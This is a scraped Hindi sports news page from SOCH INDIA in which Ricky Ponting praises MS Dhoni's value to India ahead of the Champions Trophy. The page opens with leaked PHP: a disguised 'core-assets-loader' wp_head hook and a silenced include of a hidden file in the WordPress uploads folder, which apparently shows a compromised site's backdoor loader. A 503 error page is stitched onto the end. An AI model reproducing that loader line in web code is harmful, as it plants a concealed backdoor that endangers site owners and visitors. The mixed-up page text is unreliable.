add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); भारतीय क्रिकेट को अब भी बहुत कुछ दे सकते हैं धोनी: रिकी पॉन्टिंग – SOCH INDIA
Menu

खेल
भारतीय क्रिकेट को अब भी बहुत कुछ दे सकते हैं धोनी: रिकी पॉन्टिंग

nobanner

ऑस्ट्रेलिया क्रिकेट टीम के पूर्व कप्तान रिकी पॉन्टिंग ने भारत को विश्व कप जीताने वाले भारतीय टीम के कप्तान महेंद्र सिंह धोनी की जमकर प्रशंसा की. पॉन्टिंग ने कहा कि अनुभवी विकेटकीपर और बल्लेबाज पास अब भी भारतीय टीम को देने के लिए बहुत कुछ है और वह चैम्पियंस ट्रॉफी में देश के लिए महत्वपूर्ण भूमिका निभा सकते हैं.

चैम्पियंस ट्रॉफी का आयोजन इस साल जून में इंग्लैंड और वेल्स में होगा. उल्लेखनी है कि धोनी दिसम्बर, 2014 में टेस्ट क्रिकेट से संन्यास की घोषणा की थी. इसके बाद उन्होंने इस साल की शुरुआत में सीमित ओवरों के क्रिकेट प्रारूप में भारतीय टीम की कप्तानी को भी अलविदा कह दिया.

इसके अलावा, इंडियन प्रीमियर लीग (आईपीएल)-10 की शुरुआत से पहले धोनी के स्थान पर राइजिंग पुणे सुपरजाएंट का कप्तान स्टीव स्मिथ को बनाया गया.

क्रिकेट जगत में धोनी का अब तक का करियर शानदार रहा है. उनकी कप्तानी में भारत ने 2007 टी-20 विश्व चैम्पियनशिप, 2011 विश्व कप और 2013 चैम्पियंस ट्रॉफी पर अपना कब्जा जमाया था.

पॉन्टिंग ने कहा कि अंतर्राष्ट्रीय क्रिकेट जगत में धोनी को एक पभावी बल्लेबाज न मानना गलत है. क्रिकेट ऑस्ट्रेलिया (सीए) की वेबसाइट पर जारी एक बयान में उन्होंने कहा, “मुझे लगता है कि वह अपने अनुभव के दम पर अब भी भारतीय टीम में महत्वपूर्ण खिलाड़ी बन सकते हैं. वह एक ऐसे खिलाड़ी हैं, जो मध्यम क्रम में बल्लेबाजी पर अपना नियंत्रण बना सकते हैं.”

ऑस्ट्रेलिया के दिग्गज ने कहा, “ऐसे ही अनुभ की इंग्लैंड में होने वाले चैम्पियंस ट्रॉफी टूर्नामेंट में जरुरत पड़ सकती है. भारत प्रथम क्रम में अपने विकेट गिरा सकता है और ऐसे में आपको मध्यम क्रम में ऐसे ही अनुभवी बल्लेबाज की जरूरत होगी.”

पॉन्टिंग ने कहा कि धोनी ने अपने करियर में बहुत कुछ हासिल किया है. उनके लिए अब हासिल करने लायक कुछ खास नहीं है. उनका मानना है कि हाल ही की आलोचना से धोनी के 12 साल से भी अधिक के सफल करियर पर कोई फर्क नहीं पड़ेगा और भारतीय खिलाड़ी का अनुभव ने उन्हें इस प्रकार की चीजों को नजरअंदाज करना जरूर सिखाया होगा.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.